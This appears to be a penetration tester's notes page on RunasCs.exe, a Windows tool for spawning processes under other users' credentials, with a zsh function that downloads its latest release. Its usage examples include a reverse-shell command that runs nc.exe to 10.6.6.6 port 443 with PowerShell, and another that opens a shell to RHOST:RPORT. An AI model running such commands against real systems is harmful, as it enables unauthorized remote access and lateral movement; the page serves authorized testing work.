Skip to main content

Spawn Processes as Other Users

RunasCs.exe

Project GitHub

https://github.com/antonioCoco/RunasCs/releases

Example Usage

Spawn Process with Network Credentials

# -l 8 : logontype 8 (NetworkCleartext)
# Launch reverse PowerShell session over Netcat socket
.\RunasCs.exe -d domain.tld -l 8 'username' 'password' 'C:\Windows\Temp\nc.exe 10.6.6.6 443 -e powershell.exe'

Spawn Process with Logon

.\RunasCs.exe username_here password_here powershell.exe -r RHOST:RPORT

Easy Download

I put a function in my .zshrc file and run download_runascs to easily grab the latest version of the binary from GitHub releases.

# Download latest version of RunasCs from GitHub
function download_runascs() {

    # Variables
    download_base_url='https://github.com/antonioCoco/RunasCs/releases/download/'
    tags_base_url='https://github.com/antonioCoco/RunasCs/tags'
    output_name='RunasCs.zip'
    url_version=$(
        curl -s $tags_base_url | 
        grep 'releases/tag/v' | 
        head -n 1 | 
        cut -d '>' -f 3 | 
        cut -d '<' -f 1
    )
    binary_version=$(echo $url_version | tr -d 'v')
    download_url="${download_base_url}/${url_version}/${output_name}"

    # Download, extract, set mode
    curl -sL $download_url -o "$PWD/${output_name}"
    unzip -qq "${output_name}"
    echo "RunasCs binaries downloaded and unarchived in $PWD"

}